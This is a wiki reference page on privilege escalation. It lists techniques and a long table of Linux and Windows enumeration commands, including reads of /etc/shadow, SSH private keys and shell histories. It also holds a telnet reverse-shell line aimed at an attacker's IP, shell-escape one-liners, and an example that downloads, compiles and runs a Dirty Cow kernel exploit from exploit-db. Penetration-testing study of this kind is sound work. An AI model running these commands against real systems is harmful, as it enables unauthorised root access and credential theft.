Privilege Escalation

From HackOps
Jump to navigation Jump to search

Privilege Escalation[edit | edit source]

Privilege escalation is the process of gaining higher-level permissions or access within a system after an initial foothold has been established. It plays a critical role in post-exploitation, allowing an attacker to move from a limited user account to administrative or root-level access — often enabling lateral movement, persistence, or full system compromise.

Privilege escalation is typically divided into two categories: *vertical escalation* (gaining higher privileges) and *horizontal escalation* (gaining access to resources or accounts of equal privilege).

Privilege escalation is rarely a one-step action — it follows a structured process:

  • Collect – Perform thorough enumeration across the system.
  • Process – Organize and analyze the data to identify promising leads.
  • Search – Identify known vulnerabilities and locate suitable exploit code.
  • Adapt – Customize the exploit to match the specific environment.
  • Try – Execute and iterate; exploitation often requires trial and error.


Operational Context[edit | edit source]

Privilege escalation typically follows successful Initial Access, especially when the initial compromise grants access only to limited user accounts.

This phase is crucial for:

  • Achieving administrative control (root, SYSTEM)
  • Enabling credential extraction and lateral movement
  • Bypassing sandboxed or containerized environments
  • Establishing persistence mechanisms (e.g., registry, startup tasks)

Vertical Privilege Escalation[edit | edit source]

Vertical escalation involves moving from a low-privileged account (e.g., www-data, local user) to a higher-privileged one (e.g., Administrator, SYSTEM, or root).

Common Techniques[edit | edit source]

  • Exploiting kernel or driver vulnerabilities
  • Abusing misconfigured SUID/SGID binaries (Linux)
  • Misusing weak or world-writable service files
  • Leveraging unquoted service paths (Windows)
  • DLL hijacking or service misconfiguration
  • Stealing credentials from memory or config files
  • Abusing scheduled tasks or cron jobs
  • Exploiting insecure file permissions or ownership
  • Leveraging token impersonation or privilege tokens (Windows)
  • Dumping and cracking password hashes
  • Abusing Linux capabilities (e.g., cap_sys_admin)
  • Escaping weakly isolated Docker or LXC containers
  • Exploiting insecure ACLs or lack of integrity controls

Tools[edit | edit source]

Automated Exploitation Frameworks[edit | edit source]

Horizontal Privilege Escalation[edit | edit source]

Horizontal escalation involves accessing other accounts, sessions, or resources at the same privilege level, typically through impersonation, session hijacking, or misconfigured file access.

Common Techniques[edit | edit source]

  • Reading other users’ sensitive files due to improper permissions
  • Accessing SSH keys, config files, or tokens
  • Hijacking user sessions (e.g., TTY snooping or credential reuse)
  • Exploiting insecure file-sharing configurations (e.g., SMB shares)
  • Abuse of API tokens or database credentials found in cleartext

Tools[edit | edit source]

Enumeration Checklists[edit | edit source]

Linux Enumeration Commands[edit | edit source]

Purpose Command Potential Use in Privilege Escalation
SUID/SGID binaries find / -perm -4000 2>/dev/null May reveal misconfigured binaries that can be exploited for privilege escalation.
Kernel version uname -a Identifying vulnerable kernel versions that have known local privilege escalation exploits.
Environment variables env May expose sensitive paths or misconfigured variables usable in custom script execution.
Running processes ps aux Reveals running services or scripts running as root; useful for process injection or misconfigurations.
Installed packages (Debian) dpkg -l Can identify vulnerable software versions or unintended package installs.
Installed packages (Red Hat) rpm -qa Same as above, but for RPM-based systems.
Writable directories find / -writable 2>/dev/null Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs.
Cron jobs cat /etc/crontab Look for jobs running as root or referencing writable scripts.
User info cat /etc/passwd Useful for identifying users, shell access, and potential privilege chaining.
Group info cat /etc/group Can show membership in sensitive groups like `sudo`, `docker`, or `adm`.
OS version info (Generic) cat /etc/issue Helps fingerprint system for targeted exploits.
OS version info (All common release files) cat /etc/*-release Same purpose — confirms distro and version for exploit matching.
OS version (Debian based) cat /etc/lsb-release Specifically useful for identifying Ubuntu/Debian versions.
OS version (Red Hat based) cat /etc/redhat-release Same, but for RHEL/CentOS systems.
Kernel version & architecture cat /proc/version # Shows detailed kernel version and build info

uname -a # Displays all system info including kernel name and architecture
uname -mrs # Prints kernel name, version, and hardware name
rpm -q kernel # Lists installed kernel packages (RPM-based systems)
dmesg | grep Linux # Extracts kernel-related boot messages
ls /boot | grep vmlinuz- # Lists available kernel images in /boot

Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture.
Environment configuration files cat /etc/profile # System-wide environment variables

cat /etc/bashrc # System-wide bash shell settings
cat ~/.bash_profile # User-specific environment variables
cat ~/.bashrc # User-specific bash shell settings
cat ~/.bash_logout # Commands run at logout
env # Print current environment variables

Can reveal exposed credentials, custom paths, or insecure settings that can be leveraged for privilege escalation.
Printer services lpstat -a # Lists printers and their status May indicate running printer daemons or services with elevated privileges that can be misused or are misconfigured.
Running services & privileges ps aux # Lists all running processes with associated users

ps -ef # Alternative view of all processes with full format
top # Dynamic real-time process list
cat /etc/services # Maps known services to their ports

Helps identify active services and their privilege levels, which may include insecure or unnecessary daemons.
Root-owned services grep root # Filters running processes owned by root

ps -ef | grep root # Alternate full-format view of root-owned processes

Useful for spotting services running as root that may be vulnerable or misconfigured — valuable targets for privilege escalation.
Installed applications & versions ls -alh /usr/bin/ # Lists applications and binaries in user path

ls -alh /sbin/ # Lists system binaries
dpkg -l # Lists installed packages (Debian-based systems) rpm -qa # Lists installed packages (RPM-based systems) ls -alh /var/cache/apt/archives # Shows downloaded .deb packages ls -alh /var/cache/yum/ # Shows cached .rpm packages

Reveals software presence and versions — helpful for identifying vulnerable or exploitable programs that may be running.
Service config files cat /etc/syslog.conf # Syslog daemon configuration

cat /etc/chttp.conf # Tiny HTTP server config cat /etc/lighttpd.conf # Lighttpd server config cat /etc/cups/cupsd.conf # Printing service config cat /etc/inetd.conf # Legacy super-server config cat /etc/apache2/apache2.conf # Apache main config (Debian-based) cat /etc/my.conf # MySQL config file cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based) cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)

Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors.
Scheduled jobs crontab -l # List current user's cron jobs

ls -alh /var/spool/cron # View cron job files for users ls -al /etc/ | grep cron # Search for cron-related files ls -al /etc/cron* # List contents of cron directories cat /etc/cron* # Print content of all cron config files cat /etc/at.allow # Users allowed to use 'at' cat /etc/at.deny # Users denied from using 'at' cat /etc/cron.allow # Users allowed to use cron cat /etc/cron.deny # Users denied from using cron cat /etc/crontab # System-wide cron job definitions cat /etc/anacrontab # anacron job scheduler config cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs

Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation.
Plaintext credentials grep -i user [filename] # Search for 'user' (case-insensitive)

grep -i pass [filename] # Search for 'pass' (case-insensitive) grep -C 5 "password" [filename] # Show context around 'password' find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)

These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files.
Network interfaces /sbin/ifconfig -a # Show all network interfaces and their status

cat /etc/network/interfaces # Network config (Debian-based) cat /etc/sysconfig/network # Network config (RHEL-based)

Identifies available network interfaces and reveals if the system is connected to other networks — useful for lateral movement or pivoting.
Network configuration cat /etc/resolv.conf # Shows DNS servers

cat /etc/sysconfig/network # Hostname, default gateway (RHEL-based) cat /etc/networks # Legacy network name mappings iptables -L # Lists firewall rules hostname # Shows system hostname dnsdomainname # Shows domain part of system's FQDN

Helps reveal DNS, gateway, and firewall configuration — can indicate internal network structure and potential egress routes.
Active connections & services lsof -i # Lists open network connections

lsof -i :80 # Check if web service is active grep 80 /etc/services # Maps port 80 to service name netstat -antup # Shows all TCP/UDP connections with PID netstat -antpx # Same with extended process info netstat -tulpn # All listening services with PID chkconfig --list # Lists services and runlevels chkconfig --list | grep 3:on # Services started in runlevel 3 last # Login history of users w # Who is currently logged in

Reveals running services, user activity, and possible internal communication — useful for identifying targets or attack surfaces.
Cached network data arp -e # ARP table (IP ↔ MAC mappings)

route # Kernel routing table /sbin/route -nee # Detailed routing info with interface names

Displays cached IP and MAC addresses and routing paths — may expose other systems on the network or paths for movement.
Shell access & interaction nc -lvp 4444 # Attacker. Input (Commands)

nc -lvp 4445 # Attacker. Output (Results) telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the target's system. Use the attacker's IP!

Establishing an interactive shell can allow full control of the compromised system, enabling command execution and data exfiltration.
Tunneling & redirection ssh -D 127.0.0.1:9050 -N [username]@[ip] # Create SOCKS proxy for local tunneling

proxychains ifconfig # Test command routing through proxy

Useful for pivoting through the network or anonymizing outbound traffic via local or remote tunneling.
User identity & privilege id # Show current user ID and group

who # List currently logged-in users w # Show who is logged in and what they are doing last # List recent user logins cat /etc/passwd | cut -d: -f1 # List of system users grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' # Identify superuser accounts awk -F: '($3 == "0") {print}' /etc/passwd # Another way to list UID 0 accounts cat /etc/sudoers # View sudo privileges sudo -l # List current user's sudo rights

Helps determine current privileges, available escalation paths, and visibility of other user accounts on the system.
Sensitive files cat /etc/passwd # User account information

cat /etc/group # Group definitions cat /etc/shadow # Encrypted passwords (requires root) ls -alh /var/mail/ # User mailboxes, may contain sensitive data

These files can expose system users, password hashes, and private data if permissions are misconfigured or access is gained through privilege escalation.
Home directory inspection ls -ahlR /root/ # Recursively list all files in root's home directory

ls -ahlR /home/ # Recursively list all user home directories

May reveal leftover files, misconfigured permissions, SSH keys, or credentials stored in plaintext.
Password storage in known files cat /var/apache2/config.inc # May contain hardcoded database credentials

cat /var/lib/mysql/mysql/user.MYD # Raw MySQL user table data cat /root/anaconda-ks.cfg # Kickstart config file, often contains root password in plaintext

These locations may store sensitive data such as database passwords or install-time credentials.
User activity & command history cat ~/.bash_history # Shell command history

cat ~/.nano_history # Nano editor history cat ~/.atftp_history # atftp client history cat ~/.mysql_history # MySQL client history cat ~/.php_history # PHP interactive shell history

Reviewing history files can expose credentials, database access, or other sensitive commands typed by the user.
Local user information cat ~/.bashrc # User shell configuration

cat ~/.profile # User environment profile cat /var/mail/root # Root user's email inbox cat /var/spool/mail/root # Another root mail location

These files may reveal environmental setups, messages with credentials, or scripts executed at login.
SSH key & config files cat ~/.ssh/authorized_keys # Allowed public keys for login

cat ~/.ssh/identity.pub # Public key used for SSH auth cat ~/.ssh/identity # Private key (sensitive) cat ~/.ssh/id_rsa.pub # RSA public key cat ~/.ssh/id_rsa # RSA private key cat ~/.ssh/id_dsa.pub # DSA public key cat ~/.ssh/id_dsa # DSA private key cat /etc/ssh/ssh_config # SSH client configuration cat /etc/ssh/sshd_config # SSH daemon configuration cat /etc/ssh/ssh_host_dsa_key.pub # Host DSA public key cat /etc/ssh/ssh_host_dsa_key # Host DSA private key cat /etc/ssh/ssh_host_rsa_key.pub # Host RSA public key cat /etc/ssh/ssh_host_rsa_key # Host RSA private key cat /etc/ssh/ssh_host_key.pub # Legacy host public key cat /etc/ssh/ssh_host_key # Legacy host private key

These files may expose private SSH keys, login credentials, or insecure configurations that enable unauthorized access.
Writable config files in /etc/ awk '$1 ~ /^.*w.*/' 2>/dev/null # World-writable files in /etc/

ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner-writable files ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group-writable files ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other-writable files find /etc/ -readable -type f 2>/dev/null # All readable files in /etc/ find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Readable top-level files only

Writable configuration files may allow privilege escalation by altering service behavior or execution paths.
Contents of /var/ ls -alh /var/log # Logs from services and the system

ls -alh /var/mail # Mailboxes for users ls -alh /var/spool # Scheduled tasks, print queues, and mail spools ls -alh /var/spool/lpd # Line printer daemon data ls -alh /var/lib/pgsql # PostgreSQL data directory ls -alh /var/lib/mysql # MySQL database directory cat /var/lib/dhcp3/dhclient.leases # DHCP lease information

These directories may hold logs, mail, databases, or cached network info that could leak sensitive data or credentials.
Web directories and config files ls -alhR /var/www/ # Default web root on many systems

ls -alhR /srv/www/htdocs/ # SUSE/openSUSE web root ls -alhR /usr/local/www/apache22/data/ # FreeBSD Apache web root ls -alhR /opt/lampp/htdocs/ # XAMPP web root ls -alhR /var/www/html/ # Common web root (e.g. CentOS, Ubuntu)

Useful for discovering exposed config files, credentials, or sensitive content in hosted web applications.
Log file inspection cat /etc/httpd/logs/access_log # Apache access log

cat /etc/httpd/logs/access.log # Apache access log alt path cat /etc/httpd/logs/error_log # Apache error log cat /etc/httpd/logs/error.log # Apache error log alt path cat /var/log/apache2/access_log # Apache2 access log cat /var/log/apache2/access.log # Apache2 access log alt path cat /var/log/apache2/error_log # Apache2 error log cat /var/log/apache2/error.log # Apache2 error log alt path cat /var/log/apache/access_log # Apache access log (alt) cat /var/log/apache/access.log # Apache access log (alt) cat /var/log/auth.log # Authentication events cat /var/log/chttp.log # cHTTP log cat /var/log/cups/error_log # Printer service log cat /var/log/dpkg.log # Package installation log (Debian) cat /var/log/faillog # Failed login attempts cat /var/log/httpd/access_log # Apache access log cat /var/log/httpd/access.log # Apache access log cat /var/log/httpd/error_log # Apache error log cat /var/log/httpd/error.log # Apache error log cat /var/log/lastlog # Last login of all users cat /var/log/lighttpd/access.log # Lighttpd access log cat /var/log/lighttpd/error.log # Lighttpd error log cat /var/log/lighttpd/lighttpd.access.log # Lighttpd alt access log cat /var/log/lighttpd/lighttpd.error.log # Lighttpd alt error log cat /var/log/messages # General system messages cat /var/log/secure # Security/authentication log cat /var/log/syslog # System log (Ubuntu, Debian) cat /var/log/wtmp # Login history (binary format) cat /var/log/xferlog # FTP file transfer log cat /var/log/yum.log # YUM package manager log cat /var/run/utmp # Current logins (binary format) cat /var/webmin/miniserv.log # Webmin log cat /var/www/logs/access_log # Apache access log (within web root) cat /var/www/logs/access.log # Apache access log (within web root) ls -alh /var/lib/dhcp3/ # DHCP lease and config files ls -alh /var/log/postgresql/ # PostgreSQL logs ls -alh /var/log/proftpd/ # FTP server logs ls -alh /var/log/samba/ # SMB service logs

Reviewing log files may reveal usernames, passwords, visited URLs, session tokens, or useful paths for local file inclusion (LFI) or privilege escalation.
Shell escape techniques python -c 'import pty;pty.spawn("/bin/bash")' # Spawn interactive bash shell via Python

echo os.system('/bin/bash') # Execute bash from within echo/os.system() /bin/sh -i # Interactive shell via /bin/sh

Useful for escaping restricted shells or limited environments to gain a fully interactive session.
Mounted file-systems mount # Show all currently mounted file systems

df -h # Show disk usage in human-readable format

Reveals mounted volumes, file systems, and potential writable targets for persistence or data access.
Unmounted file-systems cat /etc/fstab # Configuration file for disk mounting at boot Shows devices intended for mounting — may reveal hidden partitions, backup volumes, or encrypted containers.
Advanced file permissions find / -perm -1000 -type d 2>/dev/null # Sticky bit directories (e.g., /tmp)

find / -perm -g=s -type f 2>/dev/null # Files with SGID set find / -perm -u=s -type f 2>/dev/null # Files with SUID set find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID files for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Search *bin dirs for SGID/SUID find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null # Deep search for SUID/SGID, exclude symlinks

SUID/SGID/sticky permissions are a common source of privilege escalation vectors, especially on older systems or misconfigured apps.
Writable & executable directories find / -writable -type d 2>/dev/null # World-writable directories

find / -perm -222 -type d 2>/dev/null # Directories with write permission for anyone find / -perm -o w -type d 2>/dev/null # Same: world-writeable directories find / -perm -o x -type d 2>/dev/null # World-executable directories find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # Directories writable & executable by anyone

Identifies folders where an attacker can drop binaries or scripts for execution — commonly abused for persistence and privilege escalation.
Problematic files & ownership find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # World-writable dirs without sticky bit

find /dir -xdev \( -nouser -o -nogroup \) -print # Files with no valid user/group owner

These can indicate misconfigured permissions, abandoned files, or opportunities to tamper with files belonging to no defined user.
Available dev tools & languages find / -name perl* # Locate Perl installations

find / -name python* # Locate Python interpreters find / -name gcc* # Locate GNU Compiler Collection binaries find / -name cc # Locate C compiler

Identifying available programming environments allows exploit code to be compiled or interpreted locally — essential for privilege escalation via code execution.
File upload capabilities find / -name wget # Check for file download via wget

find / -name nc* # Netcat binaries find / -name netcat* # Alternative name for Netcat find / -name tftp* # TFTP client find / -name ftp # Basic FTP client

Discovering which tools are present for file transfer helps determine how exploits, scripts, or reverse shells can be delivered to the system.
System patch level apt-get update && apt-get upgrade # Update package lists and upgrade all packages (Debian-based)

yum update # Update all packages (RHEL-based)

Helps determine if the system has known vulnerabilities due to missing patches. Unpatched systems are often exploitable through public CVEs.


Windows Enumeration Commands[edit | edit source]

Purpose Command
Whoami and privileges whoami /priv
Local groups net localgroup administrators
Services (CMD) sc query
Services (PowerShell) Get-Service
Startup registry keys reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks schtasks /query
Installed programs wmic product get name
Environment variables set
File permissions (CMD) icacls
File permissions (Sysinternals) accesschk

Example: Local Kernel Exploit (Linux)[edit | edit source]

# Download and compile local privilege escalation exploit (example: Dirty Cow variant)
wget https://www.exploit-db.com/download/40839 -O exploit.c
gcc exploit.c -o exploit
./exploit

# Output: spawns root shell if successful

Websites & References[edit | edit source]

See Also[edit | edit source]

Retrieved from "https://hackops.wiki/index.php?title=Privilege_Escalation&oldid=162"